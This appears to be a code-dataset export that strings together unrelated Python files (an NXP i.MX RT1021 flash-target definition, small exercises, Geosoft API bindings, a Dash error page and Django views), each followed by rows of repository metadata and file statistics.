'static_base' : 0x200046a8,
'begin_stack' : 0x20008000,
'begin_data' : 0x20008000,
'page_size' : 0x00001000,
'analyzer_supported' : True,
'analyzer_address' : 0x2000a000, # Analyzer 0x2000a000..0x2000a600
'page_buffers' : [0x20008000, 0x20009000], # Enable double buffering
'min_program_length' : 0x00000100,
}
class MIMXRT1021xxxxx(IMXRT):
VENDOR = "NXP"
# Note: itcm, dtcm, and ocram share a single 256 KB block of RAM that can be configurably
# divided between those regions (this is called FlexRAM). Thus, the memory map regions for
# each of these RAMs allocate the maximum possible of 256 KB, but that is the maximum and
# will not actually be available in all regions simultaneously.
MEMORY_MAP = MemoryMap(
RamRegion(name="itcm", start=0x00000000, length=0x40000), # 256 KB
RomRegion(name="romcp", start=0x00200000, length=0x18000), # 96 KB
RamRegion(name="dtcm", start=0x20000000, length=0x40000), # 256 KB
RamRegion(name="ocram", start=0x20200000, length=0x40000), # 256 KB
FlashRegion(name="flexspi", start=0x60000000, length=0x800000, blocksize=0x1000, is_boot_memory=True,
page_size=0x100, algo=FLASH_ALGO_QUADSPI),
RamRegion(name="semc", start=0x80000000, end=0xdfffffff, is_external=True)
)
def __init__(self, session):
super(MIMXRT1021xxxxx, self).__init__(session, self.MEMORY_MAP)
self._svd_location = SVDFile.from_builtin("MIMXRT1021.xml")
| 93.877301 | 109 | 0.796072 | 5,023 | 61,208 | 9.692415 | 0.808282 | 0.06655 | 0.088734 | 0.114204 | 0.051145 | 0.042929 | 0.036356 | 0.033481 | 0.029783 | 0.027935 | 0 | 0.663387 | 0.123203 | 61,208 | 651 | 110 | 94.021505 | 0.243781 | 0.016926 | 0 | 0.027287 | 0 | 0 | 0.003857 | 0 | 0 | 0 | 0.782559 | 0 | 0 | 1 | 0.001605 | false | 0 | 0.008026 | 0 | 0.014446 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
76fed2bb4446b9a6d1b11dad51f7d8594fa6a41b | 303 | py | Python | Desafio013.py | sidneyalex/Desafios-do-Curso | 11605caf59fb8b456adaca78a41eae2f7469ab7b | [
"MIT"
] | null | null | null | Desafio013.py | sidneyalex/Desafios-do-Curso | 11605caf59fb8b456adaca78a41eae2f7469ab7b | [
"MIT"
] | null | null | null | Desafio013.py | sidneyalex/Desafios-do-Curso | 11605caf59fb8b456adaca78a41eae2f7469ab7b | [
"MIT"
] | null | null | null | #Faça um algoritmo que leia o salário de um funcionário e mostre seu novo salário, com 15% de aumento.
sal = float(input('Digite o valor do seu Salário: R$'))
aum = sal * 0.15
print('Seu salario teve aumento de 15% equivalentes a R${:.2f}. Portanto seu salário atual é R${:.2f}'.format(aum, sal + aum))
| 60.6 | 126 | 0.709571 | 55 | 303 | 3.909091 | 0.636364 | 0.093023 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.035714 | 0.168317 | 303 | 4 | 127 | 75.75 | 0.81746 | 0.333333 | 0 | 0 | 0 | 0.333333 | 0.631841 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.333333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
0a01cd4cc44cd34ff2088fce79726aeee51b131a | 163 | py | Python | common/compat.py | getcircle/django-common | 50eb9722500a5f4574c23f466d30136074887255 | [
"MIT"
] | null | null | null | common/compat.py | getcircle/django-common | 50eb9722500a5f4574c23f466d30136074887255 | [
"MIT"
] | null | null | null | common/compat.py | getcircle/django-common | 50eb9722500a5f4574c23f466d30136074887255 | [
"MIT"
] | null | null | null | """
The `compat` module provides compatibility wrappers around optional packages.
"""
try:
from service import metrics
except ImportError:
metrics = None
| 18.111111 | 77 | 0.742331 | 18 | 163 | 6.722222 | 0.944444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.184049 | 163 | 8 | 78 | 20.375 | 0.909774 | 0.472393 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
0a0fff929b7b7347c541d270e3d5d6bbe52dee81 | 630 | py | Python | src/crazy_joe/models/table.py | dpasse/crazy_joe | bb77b2f8ee2cfb26cd8f2c45e0f0da2c2db3f805 | [
"MIT"
] | null | null | null | src/crazy_joe/models/table.py | dpasse/crazy_joe | bb77b2f8ee2cfb26cd8f2c45e0f0da2c2db3f805 | [
"MIT"
] | null | null | null | src/crazy_joe/models/table.py | dpasse/crazy_joe | bb77b2f8ee2cfb26cd8f2c45e0f0da2c2db3f805 | [
"MIT"
] | null | null | null | from typing import List
from . import Column
class Table(object):
def __init__(self, name: str, columns: List[Column]) -> None:
self._name = name
self._columns = columns
@property
def name(self):
return self._name
@property
def columns(self):
return self._columns
@property
def number_of_columns(self):
return len(self._columns)
def __repr__(self) -> str:
class_name = self.__class__.__name__
columns = ', '.join([ column.__repr__() for column in self.columns ])
return f'{class_name}(name="{self.name}", columns=[{columns}])'
| 23.333333 | 77 | 0.62381 | 76 | 630 | 4.789474 | 0.328947 | 0.087912 | 0.065934 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.257143 | 630 | 26 | 78 | 24.230769 | 0.777778 | 0 | 0 | 0.157895 | 0 | 0 | 0.087302 | 0.050794 | 0 | 0 | 0 | 0 | 0 | 1 | 0.263158 | false | 0 | 0.105263 | 0.157895 | 0.631579 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 3 |
0a1d090084b26ad0348b170d8bc4322411d73097 | 309 | py | Python | tests/acceptance/test_wsgi.py | arnaud-morvan/c2cwsgiutils | aa06b77b247bd8969b88225ee3ea109886aefeac | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | tests/acceptance/test_wsgi.py | arnaud-morvan/c2cwsgiutils | aa06b77b247bd8969b88225ee3ea109886aefeac | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | tests/acceptance/test_wsgi.py | arnaud-morvan/c2cwsgiutils | aa06b77b247bd8969b88225ee3ea109886aefeac | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | from c2cwsgiutils.wsgi import _escape_variables as escape_variables # pylint: disable=W0212
def test_escape_variables():
assert {
'TOTO': 'TITI',
'TUTU': 'T%%T%%',
'TATA': '',
} == escape_variables({
'TOTO': 'TITI',
'TUTU': 'T%T%',
'TATA': ''
})
| 22.071429 | 92 | 0.521036 | 31 | 309 | 5 | 0.580645 | 0.387097 | 0.154839 | 0.167742 | 0.232258 | 0.232258 | 0 | 0 | 0 | 0 | 0 | 0.023041 | 0.297735 | 309 | 13 | 93 | 23.769231 | 0.691244 | 0.067961 | 0 | 0.181818 | 0 | 0 | 0.146853 | 0 | 0 | 0 | 0 | 0 | 0.090909 | 1 | 0.090909 | true | 0 | 0.090909 | 0 | 0.181818 | 0 | 0 | 0 | 0 | null | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
0a2b8e2cd3f79467e7109c90c443352ac4707a1c | 501 | py | Python | order-1_voronoi/core/graph/Vertex.py | bzliu94/algorithms | 43ccefd7ea1fd88339bf2afa0b35b0a3bdf6acff | [
"MIT"
] | null | null | null | order-1_voronoi/core/graph/Vertex.py | bzliu94/algorithms | 43ccefd7ea1fd88339bf2afa0b35b0a3bdf6acff | [
"MIT"
] | null | null | null | order-1_voronoi/core/graph/Vertex.py | bzliu94/algorithms | 43ccefd7ea1fd88339bf2afa0b35b0a3bdf6acff | [
"MIT"
] | null | null | null | # augmented vertex
class Vertex:
def __init__(self, element, location):
self.element = element
self.location = location
def getElement(self):
return self.element
def setElement(self, element):
self.element = element
def getLocation(self):
return self.location
def setLocation(self, location):
self.location = location
def isIndeterminate(self):
return False
def toString(self):
return str(self.location)
| 14.314286 | 41 | 0.640719 | 53 | 501 | 5.981132 | 0.320755 | 0.173502 | 0.113565 | 0.14511 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.279441 | 501 | 34 | 42 | 14.735294 | 0.878116 | 0.031936 | 0 | 0.25 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4375 | false | 0 | 0 | 0.25 | 0.75 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 3 |
0a35661d4ab8ca05971dca016c39c4fb00f2bc41 | 293 | py | Python | __main__.py | lessen/src | bc09a33d22e942214df5608806b11370e21ce7e8 | [
"MIT"
] | null | null | null | __main__.py | lessen/src | bc09a33d22e942214df5608806b11370e21ce7e8 | [
"MIT"
] | 1 | 2016-12-28T22:44:52.000Z | 2016-12-28T22:44:52.000Z | __main__.py | lessen/src | bc09a33d22e942214df5608806b11370e21ce7e8 | [
"MIT"
] | null | null | null | # import os
# def ttv1egs(l,g):
# _, _, filenames = next(iter(os.walk(".")))
# [__import__(x[:-3] ,l,g)
# for x in filenames
# if x[-5:] == "eg.py"]
# ttv1egs(locals(),globals)
import egeg
import symeg
import numeg
import sampleeg
import thingeg
import remedianeg
| 17.235294 | 47 | 0.604096 | 40 | 293 | 4.275 | 0.65 | 0.023392 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.017778 | 0.232082 | 293 | 16 | 48 | 18.3125 | 0.742222 | 0.641638 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 3 |
0a55cb861e9c96029a2a17f19cdb3ae7fd2d4937 | 214 | py | Python | 6-3.py | Holaplace/path_to_python | 8fae2aca8d6da04c39a67514948fdf50e883750a | [
"MIT"
] | 1 | 2019-02-06T01:49:18.000Z | 2019-02-06T01:49:18.000Z | 6-3.py | Holaplace/path_to_python | 8fae2aca8d6da04c39a67514948fdf50e883750a | [
"MIT"
] | null | null | null | 6-3.py | Holaplace/path_to_python | 8fae2aca8d6da04c39a67514948fdf50e883750a | [
"MIT"
] | null | null | null | file = {'amy':5,
'bob':8,
'candy':6,
'doby':9,
'john':0}
print("Amy's number is:" +'\n\t' + str(file['amy']) +'.')
print("\nBob's number is:" +'\n\t' + str(file['bob']) +'.') | 26.75 | 59 | 0.406542 | 31 | 214 | 2.806452 | 0.612903 | 0.16092 | 0.206897 | 0.229885 | 0.413793 | 0.413793 | 0.413793 | 0 | 0 | 0 | 0 | 0.032468 | 0.280374 | 214 | 8 | 59 | 26.75 | 0.532468 | 0 | 0 | 0 | 0 | 0 | 0.331731 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.285714 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
0a5b90fa34bb8bdfeaba2b755cce3ad2bd6572d7 | 232 | py | Python | sls/version.py | wilzbach/storyscript-sls | d71d74a53852ebae54bdaab341678b04f2775411 | [
"Apache-2.0"
] | null | null | null | sls/version.py | wilzbach/storyscript-sls | d71d74a53852ebae54bdaab341678b04f2775411 | [
"Apache-2.0"
] | null | null | null | sls/version.py | wilzbach/storyscript-sls | d71d74a53852ebae54bdaab341678b04f2775411 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
import pkg_resources
def get_version():
try:
return pkg_resources.get_distribution("sls").version
except pkg_resources.DistributionNotFound:
return "0.0.0"
version = get_version()
| 17.846154 | 60 | 0.676724 | 28 | 232 | 5.392857 | 0.571429 | 0.238411 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.021622 | 0.202586 | 232 | 12 | 61 | 19.333333 | 0.794595 | 0.090517 | 0 | 0 | 0 | 0 | 0.038278 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.142857 | 0 | 0.571429 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 3 |
0a6509af314d7473d9868fbd492eeb59fdff3bf0 | 1,386 | py | Python | layouts/postgresconnectionerrror.py | rigdenlab/conkit-web | bf50d28a73f43b9eb0e0c397ec1d0fd32547fdf1 | [
"BSD-3-Clause"
] | 1 | 2020-04-16T16:52:53.000Z | 2020-04-16T16:52:53.000Z | layouts/postgresconnectionerrror.py | rigdenlab/conplot | 9b3129d9e1b7ed93da63c6fd31f9b50e63f2d4d9 | [
"BSD-3-Clause"
] | 47 | 2020-05-11T13:59:11.000Z | 2022-01-21T09:37:18.000Z | layouts/postgresconnectionerrror.py | rigdenlab/conkit-web | bf50d28a73f43b9eb0e0c397ec1d0fd32547fdf1 | [
"BSD-3-Clause"
] | 5 | 2020-04-24T11:19:21.000Z | 2020-05-06T08:01:36.000Z | from utils import UrlIndex
import dash_html_components as html
from components import NavBar, Header, PostgresConnectionErrorModal
import dash_bootstrap_components as dbc
def Body():
return html.Div(
[
PostgresConnectionErrorModal(),
html.Br(),
html.Br(),
html.Br(),
dbc.Container([
dbc.Card([
dbc.CardBody([
html.Br(),
html.Br(),
html.Br(),
html.Br(),
html.H1('Cannot establish connection with PostgreSQL database!', className="card-text",
style={'text-align': "center", 'color': 'red'}),
html.Br(),
html.Br(),
html.Br(),
html.Div(html.I(className="fas fa-satellite-dish fa-7x", style={'color': 'red'}),
style={'text-align': "center"}),
html.Br(),
html.Br(),
html.Br(),
html.Br()
])
])
]),
]
)
def PostgresConnectionError():
return html.Div([
Header(),
NavBar(UrlIndex.SESSION_TIMEOUT.value),
Body(),
])
| 30.8 | 111 | 0.411255 | 109 | 1,386 | 5.183486 | 0.412844 | 0.148673 | 0.212389 | 0.212389 | 0.162832 | 0.162832 | 0.130973 | 0.084956 | 0 | 0 | 0 | 0.002729 | 0.47114 | 1,386 | 44 | 112 | 31.5 | 0.768076 | 0 | 0 | 0.4 | 0 | 0 | 0.098846 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.05 | true | 0 | 0.1 | 0.05 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
6a50996d53a9d739d009d9d04fc89ebdc28e2f43 | 161 | py | Python | smite/__init__.py | WreckRox/FlapJack-Cogs | e2950f5dc7916127c3b9519ba8bfea1f71fead40 | [
"MIT"
] | 42 | 2017-04-15T17:29:40.000Z | 2022-02-16T18:15:52.000Z | smite/__init__.py | WreckRox/FlapJack-Cogs | e2950f5dc7916127c3b9519ba8bfea1f71fead40 | [
"MIT"
] | 89 | 2017-03-22T03:21:42.000Z | 2022-03-15T18:14:49.000Z | smite/__init__.py | WreckRox/FlapJack-Cogs | e2950f5dc7916127c3b9519ba8bfea1f71fead40 | [
"MIT"
] | 72 | 2017-03-23T01:03:29.000Z | 2022-01-25T22:47:15.000Z | from .smite import Smite
__red_end_user_data_statement__ = "This cog stores discord IDs as needed for operation."
def setup(bot):
bot.add_cog(Smite(bot))
| 20.125 | 88 | 0.763975 | 26 | 161 | 4.384615 | 0.807692 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.15528 | 161 | 7 | 89 | 23 | 0.838235 | 0 | 0 | 0 | 0 | 0 | 0.322981 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.25 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
6a5ead540002955e36b4d91041631ad0227a6dd7 | 4,946 | py | Python | geosoft/gxapi/GXHXYZ.py | fearaschiarrai/gxpy | 4c5e7594b24e530a8cd94df1eef562c5c6ce3e92 | [
"BSD-2-Clause"
] | 25 | 2017-07-14T06:39:37.000Z | 2022-03-09T21:39:51.000Z | geosoft/gxapi/GXHXYZ.py | fearaschiarrai/gxpy | 4c5e7594b24e530a8cd94df1eef562c5c6ce3e92 | [
"BSD-2-Clause"
] | 100 | 2016-12-13T17:30:41.000Z | 2021-08-01T20:21:13.000Z | geosoft/gxapi/GXHXYZ.py | fearaschiarrai/gxpy | 4c5e7594b24e530a8cd94df1eef562c5c6ce3e92 | [
"BSD-2-Clause"
] | 28 | 2016-12-12T17:34:40.000Z | 2022-03-16T15:39:39.000Z | ### extends 'class_empty.py'
### block ClassImports
# NOTICE: Do not edit anything here, it is generated code
from . import gxapi_cy
from geosoft.gxapi import GXContext, float_ref, int_ref, str_ref
### endblock ClassImports
### block Header
# NOTICE: The code generator will not replace the code in this block
### endblock Header
### block ClassImplementation
# NOTICE: Do not edit anything here, it is generated code
class GXHXYZ(gxapi_cy.WrapHXYZ):
"""
GXHXYZ class.
High Performance Data Point Storage. This is used
to put Point data on a DAP server. It is compressed
and uses a Quad-Tree design to allow very high speed
data extraction. It is also multi-threaded.
"""
def __init__(self, handle=0):
super(GXHXYZ, self).__init__(GXContext._get_tls_geo(), handle)
@classmethod
def null(cls):
"""
A null (undefined) instance of `GXHXYZ <geosoft.gxapi.GXHXYZ>`
:returns: A null `GXHXYZ <geosoft.gxapi.GXHXYZ>`
:rtype: GXHXYZ
"""
return GXHXYZ()
def is_null(self):
"""
Check if this is a null (undefined) instance
:returns: True if this is a null (undefined) instance, False otherwise.
:rtype: bool
"""
return self._internal_handle() == 0
# Miscellaneous
@classmethod
def create(cls, name):
"""
Create a handle to an `GXHXYZ <geosoft.gxapi.GXHXYZ>` object
:param name: File Name
:type name: str
:returns: `GXHXYZ <geosoft.gxapi.GXHXYZ>` Object
:rtype: GXHXYZ
.. versionadded:: 5.1.3
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
ret_val = gxapi_cy.WrapHXYZ._create(GXContext._get_tls_geo(), name.encode())
return GXHXYZ(ret_val)
def get_meta(self, meta):
"""
Get the metadata of a grid.
:param meta: `GXMETA <geosoft.gxapi.GXMETA>` object to save `GXHXYZ <geosoft.gxapi.GXHXYZ>`'s meta to
:type meta: GXMETA
.. versionadded:: 5.1.3
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
self._get_meta(meta)
@classmethod
def h_create_db(cls, db, gvv, name):
"""
Make an `GXHXYZ <geosoft.gxapi.GXHXYZ>` from GDB
:param db: `GXDB <geosoft.gxapi.GXDB>` handle
:param gvv: `GXVV <geosoft.gxapi.GXVV>` of channels to export
:param name: Name of `GXHXYZ <geosoft.gxapi.GXHXYZ>` object
:type db: GXDB
:type gvv: GXVV
:type name: str
:returns: `GXHXYZ <geosoft.gxapi.GXHXYZ>` object
:rtype: GXHXYZ
.. versionadded:: 5.1.5
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
ret_val = gxapi_cy.WrapHXYZ._h_create_db(GXContext._get_tls_geo(), db, gvv, name.encode())
return GXHXYZ(ret_val)
@classmethod
def h_create_sql(cls, templ, x, y, z, ipj, name):
"""
Make an `GXHXYZ <geosoft.gxapi.GXHXYZ>` from SQL Query
:param templ: Template File Name
:param x: X field name
:param y: Y field name
:param z: Z field name
:param ipj: Projection of data values
:param name: Name of `GXHXYZ <geosoft.gxapi.GXHXYZ>` object
:type templ: str
:type x: str
:type y: str
:type z: str
:type ipj: GXIPJ
:type name: str
:returns: `GXHXYZ <geosoft.gxapi.GXHXYZ>` object
:rtype: GXHXYZ
.. versionadded:: 5.1.3
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
ret_val = gxapi_cy.WrapHXYZ._h_create_sql(GXContext._get_tls_geo(), templ.encode(), x.encode(), y.encode(), z.encode(), ipj, name.encode())
return GXHXYZ(ret_val)
def set_meta(self, meta):
"""
Set the metadata of a grid.
:param meta: `GXMETA <geosoft.gxapi.GXMETA>` object to add to `GXHXYZ <geosoft.gxapi.GXHXYZ>`'s meta
:type meta: GXMETA
.. versionadded:: 5.1.3
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
self._set_meta(meta)
### endblock ClassImplementation
### block ClassExtend
# NOTICE: The code generator will not replace the code in this block
### endblock ClassExtend
### block Footer
# NOTICE: The code generator will not replace the code in this block
### endblock Footer | 28.589595 | 147 | 0.605135 | 616 | 4,946 | 4.761364 | 0.23539 | 0.069553 | 0.073645 | 0.098193 | 0.576543 | 0.556768 | 0.527446 | 0.485851 | 0.459939 | 0.459939 | 0 | 0.014636 | 0.281642 | 4,946 | 173 | 148 | 28.589595 | 0.810864 | 0.626971 | 0 | 0.269231 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.307692 | false | 0 | 0.076923 | 0 | 0.615385 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 3 |
6a6b030ba6e0727b74c8bd4f931cd71df505022b | 1,544 | py | Python | colorizon/formattings.py | FelipeSavazii/Colorizon | 5e603d8ca3f3d0512f8448ca02d70d6c51d6e1f0 | [
"MIT"
] | null | null | null | colorizon/formattings.py | FelipeSavazii/Colorizon | 5e603d8ca3f3d0512f8448ca02d70d6c51d6e1f0 | [
"MIT"
] | null | null | null | colorizon/formattings.py | FelipeSavazii/Colorizon | 5e603d8ca3f3d0512f8448ca02d70d6c51d6e1f0 | [
"MIT"
] | null | null | null | """
MIT License
Copyright (c) 2021 FelipeSavazi
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
class Formattings:
def normal(self):
return f'\033[0m'
def bold(self, texto):
return f'\033[01m{texto}\033[0m'
def disable(self, texto):
return f'\033[02m{texto}\033[0m'
def underline(self, texto):
return f'\033[04m{texto}\033[0m'
def reverse(self, texto):
return f'\033[07m{texto}\033[0m'
def strikethrough(self, texto):
return f'\033[09m{texto}\033[0m'
def invisible(self, texto):
return f'\033[08m{texto}\033[0m'
| 33.565217 | 78 | 0.752591 | 244 | 1,544 | 4.762295 | 0.483607 | 0.075732 | 0.060241 | 0.082616 | 0.098107 | 0 | 0 | 0 | 0 | 0 | 0 | 0.048324 | 0.169041 | 1,544 | 45 | 79 | 34.311111 | 0.857366 | 0.69171 | 0 | 0 | 0 | 0 | 0.297009 | 0.282051 | 0 | 0 | 0 | 0 | 0 | 1 | 0.466667 | false | 0 | 0 | 0.466667 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 3 |
6a910011266e7abd2540c8830e2f9f21225aacee | 2,903 | py | Python | StatisticsPreview/views.py | tifat58/lsv-c4-django-webexperiment | 6aa706ad36b9766fbbf4323fdcd6e5d7420f1e16 | [
"Apache-2.0"
] | 1 | 2022-03-16T11:17:06.000Z | 2022-03-16T11:17:06.000Z | StatisticsPreview/views.py | tifat58/lsv-c4-django-webexperiment | 6aa706ad36b9766fbbf4323fdcd6e5d7420f1e16 | [
"Apache-2.0"
] | null | null | null | StatisticsPreview/views.py | tifat58/lsv-c4-django-webexperiment | 6aa706ad36b9766fbbf4323fdcd6e5d7420f1e16 | [
"Apache-2.0"
] | null | null | null | from django.shortcuts import render, get_object_or_404, redirect
from django.views.generic import View
from django.http import HttpResponseRedirect
from django.http import HttpResponse, JsonResponse
from django.core.urlresolvers import reverse
from .models import *
from distutils.util import strtobool
# Create your views here.
def upload_menu(request):
return render(request, 'upload_menu.html')
class UploadMenuView(View):
def get(self, request):
context = {}
menu_list = ResultMenu.objects.all()
context['menu_list'] = menu_list
return render(request, 'upload_menu.html', context)
def post(self, request):
menu_name = request.POST['menu_name']
is_root = strtobool(request.POST['is_root'])
# is_root = True
parent_id = request.POST['parent_id']
if parent_id != 'null':
parent = get_object_or_404(ResultMenu, pk=request.POST['parent_id'])
else:
parent = None
print(parent)
# obj = ResultMenu(menu_name=menu_name, parent_id=parent)
# obj.save()
obj, created = ResultMenu.objects.get_or_create(
menu_name=menu_name,
parent_id=parent,
defaults={'is_root':is_root},
)
return redirect('SlavMatrix:uploadMenu')
class ResultTableView(View):
def get(self, request):
context = {}
menu_list = ResultMenu.objects.all()
# for menu in menu_list:
# if menu.is_root:
context['menu_list'] = menu_list
return render(request, 'result_table.html', context)
class UploadColumnView(View):
def get(self, request):
data = {}
column_list = ColumnName.objects.all()
data['column_list'] = column_list
return render(request, 'upload_column.html', data)
def post(self, request):
full_name = request.POST['column_name']
abbvr_name = request.POST['abbvr_name']
obj, created = ColumnName.objects.get_or_create(
full_name=full_name,
abbvr_name=abbvr_name,
defaults={'is_active':True},
)
return redirect('SlavMatrix:uploadColumn')
def ResultUpload(request):
return render(request, 'blank.html')
def IntelligibilityIndividualPanslavic(request):
return render(request, 'Intell_panslavic.html')
def IntelligibilityIndividualTop(request):
return render(request, 'intell_top100.html')
def IntelligibilityPredictiveWords(request):
return render(request, 'intell_predictive.html')
def CorrLeven(request):
return render(request, 'corr_levenshtein.html')
def CorrWasp(request):
return render(request, 'corr_wasp.html')
def PredictorsCE(request):
return render(request, 'predictors_ce.html')
def PredictorsWASP(request):
return render(request, 'predictors_wasp.html')
def PredictorDistanceLevenshteinPanslavic(request):
return render(request, 'predictors_dist_levensh_panslav.html')
def PredictorDistanceLevenshteinTop(request):
return render(request, 'predictors_dist_levensh_top100.html')
def PredictorDistanceLexical(request):
return render(request, 'predictors_dist_lexical.html')
